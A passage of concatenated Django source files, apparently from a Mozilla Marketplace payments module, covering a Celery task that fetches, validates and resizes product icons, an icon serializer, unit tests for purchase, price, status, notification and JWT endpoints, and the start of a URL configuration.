            # The CDN only whitelists this extension.
            ext = 'jpg'
        # This creates an intermediate directory to avoid too-many-links
        # errors on Linux, etc. Use explicit floor division so the bucket
        # stays an integer under both Python 2 and Python 3 (plain '/'
        # would yield a float directory name on Python 3).
        return '%s/%s.%s' % (self.pk // 1000, self.pk, ext)

    class Meta:
        db_table = 'payment_assets'
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from mkt.webpay.models import ProductIcon
class ProductIconSerializer(serializers.ModelSerializer):
    """API representation of a cached product icon."""
    # Expose the absolute URL of the cached image rather than raw path
    # fields; the internal 'format' column is excluded below.
    url = serializers.SerializerMethodField('get_url')
    def get_url(self, obj):
        """Return the icon's public URL, or '' for an unsaved instance."""
        if not obj.pk:
            return ''
        return obj.url()
    class Meta:
        model = ProductIcon
        exclude = ('format',)
########NEW FILE########
__FILENAME__ = tasks
from datetime import datetime, timedelta
import logging
import os
import tempfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.db import transaction
from celeryutils import task
import requests
from amo.utils import ImageCheck, resize_image
from .models import ProductIcon
log = logging.getLogger('z.webpay.tasks')
@task
@transaction.commit_on_success
def fetch_product_icon(url, ext_size, size, read_size=100000, **kw):
    """
    Fetch and store a webpay product icon.
    Parameters:
    **url**
        Absolute URL of icon
    **ext_size**
        The height/width size that the developer claims it to be
    **size**
        The height/width webpay wants us to resize it to
    The icon will be resized if its ext_size is larger than size.
    See webpay for details on how this is used for in-app payments.
    """
    if ext_size > size:
        resize = True
    else:
        # Do not resize the icon. Adjust size so that it is correct.
        resize = False
        size = ext_size
    try:
        cached_im = ProductIcon.objects.get(ext_url=url, ext_size=ext_size)
    except ProductIcon.DoesNotExist:
        cached_im = None
    now = datetime.now()
    # Skip re-fetching icons cached within the expiry window.
    if cached_im and (cached_im.modified >
                      now - timedelta(days=settings.PRODUCT_ICON_EXPIRY)):
        log.info('Already fetched URL recently: %s' % url)
        return
    # Download into a named temp file kept on disk (delete=False) so it can
    # be reopened by the image checker/resizer below.
    tmp_dest = tempfile.NamedTemporaryFile(delete=False)
    try:
        res = requests.get(url, timeout=5)
        res.raise_for_status()
        for chunk in res.iter_content(read_size):
            tmp_dest.write(chunk)
    except (AttributeError, AssertionError):
        raise  # Raise test-related exceptions.
    except:
        # Best-effort task: any download failure is logged and swallowed
        # after cleaning up the temp file.
        tmp_dest.close()
        os.unlink(tmp_dest.name)
        log.error('fetch_product_icon error with %s' % url, exc_info=True)
        return
    else:
        tmp_dest.close()
    try:
        valid, img_format = _check_image(tmp_dest.name, url)
        if valid:
            if resize:
                log.info('resizing in-app image for URL %s' % url)
                tmp_dest = _resize_image(tmp_dest, size)
            # Save the image to the db.
            attr = dict(ext_size=ext_size, size=size, ext_url=url,
                        format=img_format)
            if cached_im:
                cached_im.update(**attr)
            else:
                cached_im = ProductIcon.objects.create(**attr)
            log.info('saving image from URL %s' % url)
            _store_image(tmp_dest, cached_im, read_size)
    finally:
        # Remove whichever temp file we ended up with (original or resized).
        os.unlink(tmp_dest.name)
def _check_image(im_path, abs_url):
    """Validate a downloaded icon: must be a still (non-animated) image.

    Returns (valid, img_format) where img_format is PIL's format string
    for a valid image and '' otherwise.  Problems are logged against
    *abs_url* so the offending remote file can be traced.
    """
    img_format = ''
    with open(im_path, 'rb') as fp:
        checker = ImageCheck(fp)
        problems = []
        if not checker.is_image():
            problems.append('image at %s is not an image' % abs_url)
        if checker.is_animated():
            problems.append('image at %s is animated' % abs_url)
        for message in problems:
            log.error(message)
        valid = not problems
        if valid:
            img_format = checker.img.format
    return valid, img_format
def _resize_image(old_im, size):
    """Resize the temp icon at *old_im* down to a *size* x *size* square.

    Returns a new NamedTemporaryFile whose .name points at the resized
    image; the caller is responsible for unlinking it.
    """
    new_dest = tempfile.NamedTemporaryFile()
    new_dest.close()
    # Pass the target size through to resize_image. Previously `size` was
    # accepted but never forwarded, so the "resized" image silently kept
    # its original dimensions.
    resize_image(old_im.name, new_dest.name, size, locally=True)
    return new_dest
def _store_image(im_src, product_icon, read_size):
    """Copy the local temp image into the product icon's storage path.

    Data is streamed in *read_size* chunks so large files are never held
    in memory all at once.
    """
    with open(im_src.name, 'rb') as src:
        with storage.open(product_icon.storage_path(), 'wb') as dest:
            chunk = src.read(read_size)
            while chunk:
                dest.write(chunk)
                chunk = src.read(read_size)
########NEW FILE########
__FILENAME__ = test_tasks
from datetime import datetime, timedelta
import os
from django.conf import settings
from django.core.files.storage import default_storage as storage
import fudge
from fudge.inspector import arg
from nose.tools import eq_
from requests.exceptions import RequestException
from amo.tests import TestCase
from mkt.webpay import tasks
from mkt.webpay.models import ProductIcon
class TestFetchProductIcon(TestCase):
    """Tests for the fetch_product_icon task, with HTTP faked via fudge."""
    def fetch(self, url='http://site/media/my.jpg', ext_size=512, size=64):
        # Helper: run the task synchronously with handy defaults.
        tasks.fetch_product_icon(url, ext_size, size)
    def open_img(self):
        # Helper: an open handle on a real JPEG test fixture.
        img = open(os.path.join(os.path.dirname(__file__),
                                'resources', 'product.jpg'), 'rb')
        self.addCleanup(img.close)
        return img
    @fudge.patch('mkt.webpay.tasks.requests')
    def test_ignore_error(self, fake_req):
        # Download errors are swallowed; nothing is stored.
        (fake_req.expects('get')
         .raises(RequestException('some error')))
        self.fetch()
        eq_(ProductIcon.objects.count(), 0)
    @fudge.patch('mkt.webpay.tasks.requests')
    def test_ignore_valid_image(self, fake_req):
        # A freshly cached icon is not re-fetched: fake_req has no
        # expectations, so any HTTP call would fail the test.
        url = 'http://site/my.jpg'
        ext_size = 512
        size = 64
        ProductIcon.objects.create(ext_url=url, size=size, ext_size=ext_size)
        self.fetch(url, ext_size, size)
    @fudge.patch('mkt.webpay.tasks.requests')
    def test_refetch_old_image(self, fake_req):
        # An icon older than PRODUCT_ICON_EXPIRY days is fetched again.
        url = 'http://site/media/my.jpg'
        ext_size = 512
        now = datetime.now()
        old = now - timedelta(days=settings.PRODUCT_ICON_EXPIRY + 1)
        prod = ProductIcon.objects.create(ext_url=url, size=64,
                                          ext_size=ext_size)
        prod.update(modified=old)
        (fake_req.expects('get').returns_fake().expects('iter_content')
         .returns(self.open_img())
         .expects('raise_for_status'))
        self.fetch(url, ext_size)
    @fudge.patch('mkt.webpay.tasks.requests')
    def test_jpg_extension(self, fake_req):
        url = 'http://site/media/my.jpg'
        (fake_req.expects('get').returns_fake().expects('iter_content')
         .returns(self.open_img())
         .expects('raise_for_status'))
        self.fetch(url)
        prod = ProductIcon.objects.get()
        for fn in (prod.storage_path, prod.url):
            assert fn().endswith('.jpg'), (
                'The CDN only whitelists .jpg not .jpeg. Got: %s' % fn())
    @fudge.patch('mkt.webpay.tasks.requests')
    def test_ignore_non_image(self, fake_req):
        # Serving this source file instead of an image must be rejected.
        im = open(__file__)
        (fake_req.expects('get').returns_fake().expects('iter_content')
         .returns(im)
         .expects('raise_for_status'))
        self.fetch()
        eq_(ProductIcon.objects.count(), 0)
    @fudge.patch('mkt.webpay.tasks.requests')
    def test_fetch_ok(self, fake_req):
        url = 'http://site/media/my.jpg'
        ext_size = 512
        size = 64
        (fake_req.expects('get')
         .with_args(url, timeout=arg.any())
         .returns_fake()
         .expects('iter_content')
         .returns(self.open_img())
         .expects('raise_for_status'))
        self.fetch(url, ext_size, size)
        prod = ProductIcon.objects.get()
        eq_(prod.ext_size, ext_size)
        eq_(prod.size, size)
        assert storage.exists(prod.storage_path()), 'Image not created'
    @fudge.patch('mkt.webpay.tasks.requests')
    @fudge.patch('mkt.webpay.tasks._resize_image')
    def test_no_resize_when_exact(self, fake_req, resize):
        # ext_size == size: _resize_image must never be called (no
        # expectations are set on the patched resize).
        url = 'http://site/media/my.jpg'
        (fake_req.expects('get')
         .returns_fake()
         .expects('iter_content')
         .returns(self.open_img())
         .expects('raise_for_status'))
        size = 64
        self.fetch(url=url, ext_size=size, size=size)
        prod = ProductIcon.objects.get()
        eq_(prod.size, size)
        assert storage.exists(prod.storage_path()), 'Image not created'
    @fudge.patch('mkt.webpay.tasks.requests')
    @fudge.patch('mkt.webpay.tasks._resize_image')
    def test_no_resize_when_smaller(self, fake_req, resize):
        # ext_size < size: stored size is clamped down to ext_size and no
        # resize happens.
        url = 'http://site/media/my.jpg'
        (fake_req.expects('get')
         .returns_fake()
         .expects('iter_content')
         .returns(self.open_img())
         .expects('raise_for_status'))
        size = 22
        self.fetch(url=url, ext_size=size, size=64)
        prod = ProductIcon.objects.get()
        eq_(prod.size, size)
        eq_(prod.ext_size, size)
        assert storage.exists(prod.storage_path()), 'Image not created'
########NEW FILE########
__FILENAME__ = test_views
import json
from decimal import Decimal
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.http import HttpRequest
import jwt
from mock import patch
from nose.tools import eq_, ok_
import mkt
from access.models import GroupUser
from amo import CONTRIB_PENDING, CONTRIB_PURCHASE
from amo.tests import TestCase
from constants.payments import PROVIDER_BANGO
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants import regions
from mkt.purchase.tests.utils import InAppPurchaseTest, PurchaseTest
from mkt.site.fixtures import fixture
from mkt.prices.models import Price, PriceCurrency
from mkt.prices.views import PricesViewSet
from mkt.webpay.models import ProductIcon
from stats.models import Contribution
from users.models import UserProfile
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request',
       lambda s, r: mkt.regions.US)
class TestPrepareWebApp(PurchaseTest, RestOAuth):
    """Tests for the webpay-prepare endpoint (app purchase JWT creation)."""
    fixtures = fixture('webapp_337141', 'user_2519', 'prices')
    def setUp(self):
        RestOAuth.setUp(self)  # Avoid calling PurchaseTest.setUp().
        self.user = UserProfile.objects.get(pk=2519)
        self.list_url = reverse('webpay-prepare')
        self.setup_base()
        self.setup_package()
        self.setup_mock_generic_product()
        self.setup_public_id()
    def _post(self, client=None, extra_headers=None):
        # Helper: POST a purchase-prepare request for self.addon.
        if client is None:
            client = self.client
        if extra_headers is None:
            extra_headers = {}
        return client.post(self.list_url,
                           data=json.dumps({'app': self.addon.pk}),
                           **extra_headers)
    def test_allowed(self):
        self._allowed_verbs(self.list_url, ['post'])
    def test_anon(self):
        # Anonymous users may not prepare purchases.
        res = self._post(self.anon)
        eq_(res.status_code, 403)
        eq_(res.json,
            {'detail': 'Authentication credentials were not provided.'})
    def test_get_jwt(self, client=None, extra_headers=None):
        """A successful prepare returns a JWT and a contribution status URL."""
        res = self._post(client=client, extra_headers=extra_headers)
        eq_(res.status_code, 201, res.content)
        contribution = Contribution.objects.get()
        eq_(res.json['contribStatusURL'],
            reverse('webpay-status', kwargs={'uuid': contribution.uuid}))
        ok_(res.json['webpayJWT'])
    @patch.object(settings, 'SECRET_KEY', 'gubbish')
    def test_good_shared_secret(self):
        # Like test_good, except we do shared secret auth manually.
        extra_headers = {
            'HTTP_AUTHORIZATION': 'mkt-shared-secret '
                                  '[email protected],56b6f1a3dd735d962c56'
                                  'ce7d8f46e02ec1d4748d2c00c407d75f0969d08bb'
                                  '9c68c31b3371aa8130317815c89e5072e31bb94b4'
                                  '121c5c165f3515838d4d6c60c4,165d631d3c3045'
                                  '458b4516242dad7ae'
        }
        self.user.update(email='[email protected]')
        self.test_get_jwt(client=self.anon, extra_headers=extra_headers)
    @patch('mkt.webapps.models.Webapp.has_purchased')
    def test_already_purchased(self, has_purchased):
        # Re-purchasing an owned app is a 409 conflict.
        has_purchased.return_value = True
        res = self._post()
        eq_(res.status_code, 409)
        eq_(res.json, {"reason": "Already purchased app."})
class TestPrepareInApp(InAppPurchaseTest, RestOAuth):
    """Tests for the ``webpay-prepare-inapp`` endpoint. In-app purchase
    preparation is unauthenticated, so all requests go through self.anon."""

    fixtures = fixture('webapp_337141', 'user_2519', 'prices')

    def setUp(self):
        RestOAuth.setUp(self)  # Avoid calling PurchaseTest.setUp().
        self.user = UserProfile.objects.get(pk=2519)
        self.setup_base()
        self.setup_package()
        self.setup_public_id()
        self.list_url = reverse('webpay-prepare-inapp')

    def _post(self, inapp_id=None, extra_headers=None):
        # Helper: POST an in-app product pk anonymously.
        inapp_id = inapp_id or self.inapp.pk
        extra_headers = extra_headers or {}
        return self.anon.post(self.list_url,
                              data=json.dumps({'inapp': inapp_id}),
                              **extra_headers)

    def test_allowed(self):
        self._allowed_verbs(self.list_url, ['post'])

    def test_bad_id_raises_400(self):
        res = self._post(inapp_id='invalid id')
        eq_(res.status_code, 400, res.content)

    def test_get_jwt(self, extra_headers=None):
        # Success returns 201 with the JWT and the contribution status URL.
        res = self._post(extra_headers=extra_headers)
        eq_(res.status_code, 201, res.content)
        contribution = Contribution.objects.get()
        eq_(res.json['contribStatusURL'],
            reverse('webpay-status', kwargs={'uuid': contribution.uuid}))
        ok_(res.json['webpayJWT'])
class TestStatus(RestOAuth):
    """Tests for the ``webpay-status`` endpoint that reports whether a
    contribution's purchase completed ('complete' vs 'incomplete')."""

    fixtures = fixture('webapp_337141', 'user_2519')

    def setUp(self):
        super(TestStatus, self).setUp()
        self.contribution = Contribution.objects.create(
            addon_id=337141, user_id=2519, type=CONTRIB_PURCHASE,
            uuid='some:uid')
        self.get_url = reverse('webpay-status',
                               kwargs={'uuid': self.contribution.uuid})

    def test_allowed(self):
        self._allowed_verbs(self.get_url, ['get'])

    def test_get(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        eq_(res.json['status'], 'complete')

    def test_no_contribution(self):
        # Unknown uuids report 'incomplete' (200, not 404) so callers
        # cannot probe for valid contribution ids.
        self.contribution.delete()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200, res.content)
        eq_(res.json['status'], 'incomplete', res.content)

    def test_incomplete(self):
        self.contribution.update(type=CONTRIB_PENDING)
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200, res.content)
        eq_(res.json['status'], 'incomplete', res.content)

    def test_no_purchase(self):
        # A purchase-type contribution without an AddonPurchase row is
        # still reported as incomplete.
        self.contribution.addon.addonpurchase_set.get().delete()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200, res.content)
        eq_(res.json['status'], 'incomplete', res.content)

    def test_not_owner(self):
        # Only the owner of the contribution may read its status.
        userprofile2 = UserProfile.objects.get(pk=31337)
        self.contribution.update(user=userprofile2)
        res = self.client.get(self.get_url)
        eq_(res.status_code, 403, res.content)
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request',
       lambda s, r: mkt.regions.BR)
class TestPrices(RestOAuth):
    """Tests for the price-list/price-detail API: tier listing, provider
    and price-point filtering, CORS, and locale-aware price formatting.
    Region detection is stubbed to BR."""

    def make_currency(self, amount, tier, currency, region):
        # Helper: attach a PriceCurrency (Bango provider) to a tier.
        return PriceCurrency.objects.create(
            price=Decimal(amount), tier=tier,
            currency=currency, provider=PROVIDER_BANGO, region=region.id)

    def setUp(self):
        super(TestPrices, self).setUp()
        self.price = Price.objects.create(name='1', price=Decimal(1))
        self.currency = self.make_currency(3, self.price, 'DE', regions.DE)
        self.us_currency = self.make_currency(3, self.price, 'USD', regions.US)
        self.list_url = reverse('price-list')
        self.get_url = reverse('price-detail', kwargs={'pk': self.price.pk})

        # If regions change, this will blow up.
        assert regions.BR.default_currency == 'BRL'

    def get_currencies(self, data):
        # Extract the currency codes from a serialized price tier.
        return [p['currency'] for p in data['prices']]

    def test_list_allowed(self):
        self._allowed_verbs(self.list_url, ['get'])
        self._allowed_verbs(self.get_url, ['get'])

    def test_single(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        eq_(res.json['pricePoint'], '1')
        eq_(res.json['name'], 'Tier 1')
        # Ensure that price is in the JSON since solitude depends upon it.
        eq_(res.json['price'], '1.00')

    def test_list_filtered_price_point(self):
        Price.objects.create(name='42', price=Decimal(42))
        res = self.client.get(self.list_url, {'pricePoint': '1'})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['pricePoint'], '1')

    def test_list(self):
        res = self.client.get(self.list_url)
        eq_(res.json['meta']['total_count'], 1)
        self.assertSetEqual(self.get_currencies(res.json['objects'][0]),
                            ['USD', 'DE'])

    def test_list_filtered_provider(self):
        # Currencies from other providers are filtered out of the list.
        self.currency.update(provider=0)
        res = self.client.get(self.list_url, {'provider': 'bango'})
        eq_(self.get_currencies(res.json['objects'][0]), ['USD'])

    def test_prices(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        self.assertSetEqual(self.get_currencies(res.json), ['USD', 'DE'])

    def test_prices_filtered_provider(self):
        self.currency.update(provider=0)
        res = self.client.get(self.get_url, {'provider': 'bango'})
        eq_(res.status_code, 200)
        self.assertSetEqual(self.get_currencies(res.json), ['USD'])

    def test_has_cors(self):
        self.assertCORS(self.client.get(self.get_url), 'get')

    @patch('mkt.api.exceptions.got_request_exception')
    @patch('mkt.prices.models.Price.prices')
    def test_other_cors(self, prices, got_request_exception):
        # Even a 500 from an internal error must still carry CORS headers
        # and report the exception through the got_request_exception signal.
        prices.side_effect = ValueError('The Price Is Not Right.')
        res = self.client.get(self.get_url)
        eq_(res.status_code, 500)
        self.assertCORS(res, 'get')
        exception_handler_args = got_request_exception.send.call_args
        eq_(exception_handler_args[0][0], PricesViewSet)
        eq_(exception_handler_args[1]['request'].path, self.get_url)
        ok_(isinstance(exception_handler_args[1]['request'], HttpRequest))

    def test_locale(self):
        self.make_currency(5, self.price, 'BRL', regions.BR)
        res = self.client.get(self.get_url, HTTP_ACCEPT_LANGUAGE='pt-BR')
        eq_(res.status_code, 200)
        eq_(res.json['localized']['locale'], 'R$5,00')

    def test_locale_list(self):
        # Check that for each price tier a different localisation is
        # returned.
        self.make_currency(2, self.price, 'BRL', regions.BR)
        price_two = Price.objects.create(name='2', price=Decimal(1))
        self.make_currency(12, price_two, 'BRL', regions.BR)

        res = self.client.get(self.list_url, HTTP_ACCEPT_LANGUAGE='pt-BR')
        eq_(res.status_code, 200)
        eq_(res.json['objects'][0]['localized']['locale'], 'R$2,00')
        eq_(res.json['objects'][1]['localized']['locale'], 'R$12,00')

    def test_no_locale(self):
        # This results in a region of BR and a currency of BRL. But there
        # isn't a price tier for that currency. So we don't know what to show.
        res = self.client.get(self.get_url, HTTP_ACCEPT_LANGUAGE='pt-BR')
        eq_(res.status_code, 200)
        eq_(res.json['localized'], {})
class TestNotification(RestOAuth):
    """Tests for the ``webpay-failurenotification`` endpoint, which emails
    app authors when a payment postback repeatedly fails."""

    fixtures = fixture('webapp_337141', 'user_2519')

    def setUp(self):
        super(TestNotification, self).setUp()
        # The endpoint requires the Transaction:NotifyFailure permission.
        self.grant_permission(self.profile, 'Transaction:NotifyFailure')
        self.contribution = Contribution.objects.create(addon_id=337141,
                                                        uuid='sample:uuid')
        self.get_url = reverse('webpay-failurenotification',
                               kwargs={'pk': self.contribution.pk})
        self.data = {'url': 'https://someserver.com', 'attempts': 5}

    def test_list_allowed(self):
        self._allowed_verbs(self.get_url, ['patch'])

    def test_notify(self):
        # A valid PATCH sends one email to the app author containing the
        # failing postback URL.
        res = self.client.patch(self.get_url, data=json.dumps(self.data))
        eq_(res.status_code, 202)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        assert self.data['url'] in msg.body
        eq_(msg.recipients(), [u'[email protected]'])

    def test_no_permission(self):
        GroupUser.objects.filter(user=self.profile).delete()
        res = self.client.patch(self.get_url, data=json.dumps(self.data))
        eq_(res.status_code, 403)

    def test_missing(self):
        # Missing form fields are a 400.
        res = self.client.patch(self.get_url, data=json.dumps({}))
        eq_(res.status_code, 400)

    def test_not_there(self):
        self.get_url = reverse('webpay-failurenotification',
                               kwargs={'pk': self.contribution.pk + 42})
        res = self.client.patch(self.get_url, data=json.dumps(self.data))
        eq_(res.status_code, 404)

    def test_no_uuid(self):
        # Contributions without a uuid are excluded from the queryset,
        # so the lookup 404s.
        self.contribution.update(uuid=None)
        res = self.client.patch(self.get_url, data=json.dumps(self.data))
        eq_(res.status_code, 404)
class TestProductIconResource(RestOAuth):
    """Tests for the product icon API: POST queues an async fetch/resize
    task; GET supports anonymous filtering by ext_url/ext_size/size."""

    fixtures = fixture('webapp_337141', 'user_2519')

    def setUp(self):
        super(TestProductIconResource, self).setUp()
        self.list_url = reverse('producticon-list')
        # Patch the celery task so no real fetching/resizing happens.
        p = patch('mkt.webpay.tasks.fetch_product_icon')
        self.fetch_product_icon = p.start()
        self.addCleanup(p.stop)
        self.data = {
            'ext_size': 128,
            'ext_url': 'http://someappnoreally.com/icons/icon_128.png',
            'size': 64
        }

    def post(self, data, with_perms=True):
        # Helper: POST icon data, optionally granting ProductIcon:Create.
        if with_perms:
            self.grant_permission(self.profile, 'ProductIcon:Create')
        return self.client.post(self.list_url, data=json.dumps(data))

    def test_list_allowed(self):
        self._allowed_verbs(self.list_url, ['get', 'post'])

    def test_missing_fields(self):
        res = self.post({'ext_size': 1})
        eq_(res.status_code, 400)

    def test_post(self):
        # A valid POST returns 202 and queues the fetch task with the
        # submitted url/sizes.
        res = self.post(self.data)
        eq_(res.status_code, 202)
        self.fetch_product_icon.delay.assert_called_with(self.data['ext_url'],
                                                         self.data['ext_size'],
                                                         self.data['size'])

    def test_post_without_perms(self):
        res = self.post(self.data, with_perms=False)
        eq_(res.status_code, 403)

    def test_anon_get_filtering(self):
        # Anonymous GET can filter by ext_size, size, and exact ext_url.
        icon = ProductIcon.objects.create(**{
            'ext_size': 128,
            'ext_url': 'http://someappnoreally.com/icons/icon_128.png',
            'size': 64,
            'format': 'png'
        })
        extra_icon = ProductIcon.objects.create(**{
            'ext_size': 256,
            'ext_url': 'http://someappnoreally.com/icons/icon_256.png',
            'size': 64,
            'format': 'png'
        })
        res = self.anon.get(self.list_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)

        res = self.anon.get(self.list_url, data={'ext_size': 128})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        eq_(data['objects'][0]['url'], icon.url())

        res = self.anon.get(self.list_url, data={'size': 64})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)

        res = self.anon.get(
            self.list_url,
            data={'ext_url': 'http://someappnoreally.com/icons/icon_256.png'})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        eq_(data['objects'][0]['url'], extra_icon.url())
class TestSigCheck(TestCase):
    """Test that the sig_check endpoint returns a JWT signed with the
    configured purchase secret and carrying the expected claims."""

    def test(self):
        key = 'marketplace'
        aud = 'webpay'
        secret = 'third door on the right'
        with self.settings(APP_PURCHASE_SECRET=secret,
                           APP_PURCHASE_KEY=key,
                           APP_PURCHASE_AUD=aud):
            res = self.client.post(reverse('webpay-sig_check'))
        eq_(res.status_code, 201, res)
        data = json.loads(res.content)
        # Decoding with the shared secret verifies the signature.
        req = jwt.decode(data['sig_check_jwt'].encode('ascii'), secret)
        eq_(req['iss'], key)
        eq_(req['aud'], aud)
        eq_(req['typ'], 'mozilla/payments/sigcheck/v1')
########NEW FILE########
__FILENAME__ = test_webpay_jwt
import urlparse
from urllib import urlencode
from django.conf import settings
from django.test.utils import override_settings
import jwt
from mozpay.verify import verify_claims, verify_keys
from nose.tools import eq_, raises
from amo.helpers import absolutify
from constants.payments import PROVIDER_BOKU
from mkt.developers.models import AddonPaymentAccount, PaymentAccount
from amo.urlresolvers import reverse
from mkt.purchase.tests.utils import InAppPurchaseTest, PurchaseTest
from mkt.webpay.webpay_jwt import (get_product_jwt, InAppProduct,
WebAppProduct)
from stats.models import Contribution
class TestPurchaseJWT(PurchaseTest):
    """Tests for get_product_jwt(): claim/key validity and payload
    content of the JWT handed to navigator.pay()."""

    def setUp(self):
        super(TestPurchaseJWT, self).setUp()
        self.product = WebAppProduct(self.addon)
        self.contribution = Contribution.objects.create(
            user=self.user,
            addon=self.addon,
        )

    def decode_token(self):
        # Build and decode (without signature verification) the JWT.
        token = get_product_jwt(self.product, self.contribution)
        return jwt.decode(str(token['webpayJWT']), verify=False)

    def test_claims(self):
        verify_claims(self.decode_token())

    def test_keys(self):
        verify_keys(self.decode_token(),
                    ('iss',
                     'typ',
                     'aud',
                     'iat',
                     'exp',
                     'request.name',
                     'request.description',
                     'request.pricePoint',
                     'request.postbackURL',
                     'request.chargebackURL',
                     'request.productData'))

    def test_valid_jwt(self):
        token_data = self.decode_token()
        eq_(token_data['iss'], settings.APP_PURCHASE_KEY)
        eq_(token_data['typ'], settings.APP_PURCHASE_TYP)
        eq_(token_data['aud'], settings.APP_PURCHASE_AUD)

        request = token_data['request']
        eq_(request['id'], self.product.external_id())
        eq_(request['name'], self.product.name())
        eq_(request['icons'], self.product.icons())
        eq_(request['description'], self.product.description())
        eq_(request['pricePoint'], self.product.price().name)
        eq_(request['postbackURL'], absolutify(reverse('webpay.postback')))
        eq_(request['chargebackURL'], absolutify(reverse('webpay.chargeback')))

        # productData is urlencoded; compare the parsed querystrings so
        # parameter order does not matter.
        token_product_data = urlparse.parse_qs(request['productData'])
        expected_product_data = urlparse.parse_qs(
            urlencode(self.product.product_data(self.contribution)))
        eq_(token_product_data, expected_product_data)

    @raises(ValueError)
    def test_empty_public_id(self):
        # JWTs cannot be created without a cached solitude public_id.
        self.addon.update(solitude_public_id=None)
        self.decode_token()
class BaseTestWebAppProduct(PurchaseTest):
    """Shared setup for WebAppProduct tests: one product and one
    contribution for the purchased app."""

    def setUp(self):
        super(BaseTestWebAppProduct, self).setUp()
        self.product = WebAppProduct(self.addon)
        self.contribution = Contribution.objects.create(
            user=self.user,
            addon=self.addon,
        )
        # NOTE(review): re-fetching the contribution looks redundant;
        # presumably it reloads DB-populated fields (e.g. uuid) -- confirm.
        self.contribution = Contribution.objects.get()
class TestWebAppProduct(BaseTestWebAppProduct):
    """Tests for the WebAppProduct binding-layer accessors."""

    def test_external_id_with_no_domain(self):
        # Without a DOMAIN setting the dev namespace is used.
        with self.settings(DOMAIN=None):
            eq_(self.product.external_id(),
                'marketplace-dev:{0}'.format(self.addon.pk))

    def test_external_id_with_domain(self):
        # Only the first label of the domain becomes the namespace.
        with self.settings(DOMAIN='marketplace.allizom.org'):
            eq_(self.product.external_id(),
                'marketplace:{0}'.format(self.addon.pk))

    def test_webapp_product(self):
        eq_(self.product.id(), self.addon.pk)
        eq_(self.product.name(), unicode(self.addon.name))
        eq_(self.product.addon(), self.addon)
        eq_(self.product.price(), self.addon.premium.price)
        eq_(self.product.icons()['512'],
            absolutify(self.addon.get_icon_url(512)))
        eq_(self.product.description(), self.addon.description)
        eq_(self.product.application_size(),
            self.addon.current_version.all_files[0].size)

        product_data = self.product.product_data(self.contribution)
        eq_(product_data['contrib_uuid'], self.contribution.uuid)
        eq_(product_data['public_id'], self.public_id)
        eq_(product_data['addon_id'], self.product.addon().pk)
        eq_(product_data['application_size'], self.product.application_size())
@override_settings(PAYMENT_PROVIDERS=['bango', 'boku'])
class TestWebAppProductMultipleProviders(BaseTestWebAppProduct):
    """product_data() must stay correct when the app has payment accounts
    with more than one provider (Bango + Boku)."""

    def setUp(self):
        super(TestWebAppProductMultipleProviders, self).setUp()
        # Add a second (Boku) payment account for the same app.
        account = PaymentAccount.objects.create(
            user=self.user, uri='foo', name='test', inactive=False,
            solitude_seller=self.seller, account_id=321, seller_uri='abc',
            provider=PROVIDER_BOKU)
        AddonPaymentAccount.objects.create(
            addon=self.addon, account_uri='foo',
            payment_account=account, product_uri='newuri')

    def test_webapp_product_multiple_providers(self):
        product_data = self.product.product_data(self.contribution)
        eq_(product_data['contrib_uuid'], self.contribution.uuid)
        eq_(product_data['public_id'], self.public_id)
        eq_(product_data['addon_id'], self.product.addon().pk)
        eq_(product_data['application_size'],
            self.product.application_size())
class TestInAppProduct(InAppPurchaseTest):
    """Tests for the InAppProduct binding-layer accessors."""

    def setUp(self):
        super(TestInAppProduct, self).setUp()
        self.contribution = Contribution.objects.create(
            user=self.user,
            addon=self.addon,
        )
        self.product = InAppProduct(self.inapp)

    def test_external_id_with_no_domain(self):
        # In-app ids are prefixed with 'inapp.' on top of the namespace.
        with self.settings(DOMAIN=None):
            eq_(self.product.external_id(),
                'inapp.marketplace-dev:{0}'.format(self.inapp.pk))

    def test_external_id_with_domain(self):
        with self.settings(DOMAIN='marketplace.allizom.org'):
            eq_(self.product.external_id(),
                'inapp.marketplace:{0}'.format(self.inapp.pk))

    def test_inapp_product(self):
        eq_(self.product.id(), self.inapp.pk)
        eq_(self.product.name(), unicode(self.inapp.name))
        eq_(self.product.addon(), self.inapp.webapp)
        eq_(self.product.price(), self.inapp.price)
        eq_(self.product.icons()[64], absolutify(self.inapp.logo_url))
        eq_(self.product.description(), self.inapp.webapp.description)
        # In-app products have no downloadable package, so no size.
        eq_(self.product.application_size(), None)

        product_data = self.product.product_data(self.contribution)
        eq_(product_data['contrib_uuid'], self.contribution.uuid)
        eq_(product_data['addon_id'], self.product.addon().pk)
        eq_(product_data['inapp_id'], self.product.id())
        eq_(product_data['application_size'], self.product.application_size())
        eq_(product_data['public_id'], self.public_id)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework import routers
from mkt.webpay.views import (FailureNotificationView,
PreparePayWebAppView, PreparePayInAppView,
ProductIconViewSet, sig_check, StatusPayView)
# Router for the product icon resource (list/detail under product/icon/).
api = routers.SimpleRouter()
api.register(r'product/icon', ProductIconViewSet)

urlpatterns = patterns(
    '',
    # NOTE(review): the router URLs are included both at the root and
    # under webpay/ -- presumably for backwards compatibility; confirm.
    url(r'^', include(api.urls)),
    url(r'^webpay/', include(api.urls)),
    url(r'^webpay/status/(?P<uuid>[^/]+)/', StatusPayView.as_view(),
        name='webpay-status'),
    url(r'^webpay/prepare/', PreparePayWebAppView.as_view(),
        name='webpay-prepare'),
